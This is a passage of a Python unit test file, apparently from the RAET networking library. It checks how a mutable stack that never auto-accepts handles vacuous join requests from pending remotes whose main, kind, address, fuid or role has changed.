alpha.removeRemote(alpha.remotes.values()[0])
beta.removeRemote(beta.remotes.values()[0])
# Mutable: Either (use No as most strict)
self.assertIs(alpha.mutable, None)
# AutoMode: Any (use Never as most strict)
alpha.keep.auto = raeting.AutoMode.never.value
# Ensure the next join would be ephemeral
self.assertIs(len(alpha.remotes), 0)
self.assertIs(len(alpha.nameRemotes), 0)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Body
# Main: Body
# Kind: Body
# RHA: Header
# Nuid: Computed
# Fuid: Header
# Leid: 0
# Reid: Header
# Role: Body
# Keys: Body
# Sameness: sameAll
alpha.clearStats()
beta.clearStats()
# Join
self.join(beta, alpha)
# Action: Accept, Add, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIn('join_correspond_complete', alpha.stats.keys())
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats.keys())
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alpha.remotes.values()[0], remoteData))
# Check role/keys dumped
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousPendingPendNewMain(self):
'''
Test joinent pend and dump vacuous join with an updated main from pending remote (F1)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendNewMain.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
oldMain = None
newMain = True
# Name: Old
# Main: New
self.assertIs(beta.main, oldMain)
beta.main = newMain
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Join with new main
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertIs(alphaRemote.main, newMain)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump of pended data
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['main'], beta.main) # new main value
self.assertIs(remoteData['fuid'], betaRemote.nuid) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousPendingPendNewKind(self):
'''
Test mutable joinent pend vacuous join with an updated kind (F2)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendNewKind.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
oldKind = None
newKind = 33
# Name: Old
# Main: Either
# Kind: New
self.assertIs(beta.kind, oldKind)
beta.kind = newKind
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Join with new kind
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.kind, newKind)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['kind'], beta.kind) # new main value
self.assertIs(remoteData['fuid'], betaRemote.nuid) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousPendingPendNewRha(self):
'''
Test mutable joinent pend vacuous join with an updated remote host address (F3)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendNewRha.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Simulate: alpha already know beta with ha=('127.0.0.1', 7532)
# beta connects with ha=('127.0.0.1', 7531)
oldHa = (beta.local.ha[0], 7532)
newHa = (beta.local.ha[0], beta.local.ha[1])
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=oldHa,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
# Appl: Either
# RHA: New: alpha remote ha is set to (127.0.0.1, 7532)
# new ha received from beta is (127.0.0.1, 7531)
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
self.assertEqual(alphaRemote.ha, oldHa)
self.assertEqual(beta.local.ha, newHa)
keep = self.copyData(alphaRemote)
# Join with updated Ha
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.ha, newHa)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(tuple(remoteData['ha']), beta.local.ha) # new value
self.assertIs(remoteData['fuid'], betaRemote.nuid) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinentVacuousPendingPendNewFuid(self):
        '''
        Test mutable joinent pend vacuous join with an updated fuid (F4)

        Alpha (joinent, mutable, auto-accept mode Never) already knows beta
        under a stale fuid; beta initiates a vacuous join carrying a new fuid.
        Alpha must update the fuid, pend the remote, and complete the join
        only after the pending remote is explicitly accepted.
        '''
        console.terse("{0}\n".format(self.testJoinentVacuousPendingPendNewFuid.__doc__))
        # Status: Pending
        # Mode: Never
        alpha, beta = self.bootstrapStacks()
        alpha.keep.auto = raeting.AutoMode.never.value
        # Mutable: Yes
        alpha.mutable = True
        # Vacuous: Yes
        betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                          fuid=0, # vacuous join
                                                          sid=0, # always 0 for join
                                                          ha=alpha.local.ha))
        # Simulate: alpha already knows beta with the stale fuid=33;
        # beta connects with a new fuid=newFuid
        oldFuid = 33
        newFuid = betaRemote.nuid
        # Ephemeral: No Name (the name is known)
        alphaRemote = estating.RemoteEstate(stack=alpha,
                                            fuid=oldFuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        alpha.addRemote(alphaRemote)
        alpha.keep.pendRemote(alphaRemote)
        # Ensure remote status is Pending
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
        # Name: Old
        # Main: Either
        # Kind: Either
        # RHA: Either
        # Nuid: Computed
        # Fuid: New: alphaRemote has uid=33 that is 'old', betaRemote has uid=2
        # Leid: 0
        # Reid: New
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(alphaRemote)  # snapshot to verify what changed after the join
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Pend, Dump -- join transaction stalls until remote is accepted
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 1)
            self.assertEqual(len(stack.remotes), 1)
            self.assertEqual(len(stack.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertTrue(alpha.mutable)
        self.assertIs(beta.mutable, None)
        # Assert alphaRemote is modified (fuid updated) but role/keys unchanged
        self.assertFalse(self.sameAll(alphaRemote, keep))
        self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
        self.assertEqual(alphaRemote.fuid, newFuid)
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
        self.assertIs(betaRemote.acceptance, None)
        # Check remote dump
        remoteData = alpha.keep.loadRemoteData(beta.local.name)
        self.assertIsNot(remoteData, None)
        self.assertIs(remoteData['fuid'], betaRemote.nuid) # new value
        self.assertEqual(remoteData['role'], beta.local.role)
        self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
        self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
        # Check role/keys dump
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
        # Accept the pending remote so the stalled join transaction can finish
        alpha.keep.acceptRemote(alphaRemote)
        self.serviceStacks([alpha, beta], duration=3.0)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertEqual(len(stack.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertTrue(alpha.mutable)
        self.assertIs(beta.mutable, None)
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 1)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        # Check remote dump
        remoteData = alpha.keep.loadRemoteData(beta.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])  # ha loads as a list; normalize for sameAll
        self.assertTrue(self.sameAll(alphaRemote, remoteData))
        # Check role/keys dump
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinentVacuousPendingPendNewRole(self):
'''
Test mutable joinent pend vacuous join with an updated role (F5)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendNewRole.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.pendRemote(alphaRemote)
oldRole = 'beta'
newRole = 'beta_new'
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: New
self.assertIs(beta.local.role, oldRole)
beta.local.role = newRole
beta.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Ensure alpha knows nothing about the new role
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Join with updated role
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.role, newRole)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousPendingPendSameAll(self):
'''
Test joinent pend vacuous join with same all from pending remote (G1)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendSameAll.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Either
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Computed
# Fuid: Old
# Leid: 0
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(alphaRemote)
# Join
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['fuid'], betaRemote.nuid) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousEphemeralPendingPendSameAll(self):
'''
Test joinent pend vacuous ephemeral join with same all from pending remote (G2)
'''
console.terse("{0}\n".format(self.testJoinentVacuousEphemeralPendingPendSameAll.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapJoinedRemotes()
alpha.keep.pendRemote(alpha.remotes.values()[0])
alpha.removeRemote(alpha.remotes.values()[0])
beta.removeRemote(beta.remotes.values()[0])
# Mutable: Either
alpha.mutable = True
# AutoMode: Never
alpha.keep.auto = raeting.AutoMode.never.value
# Ensure the next join would be ephemeral
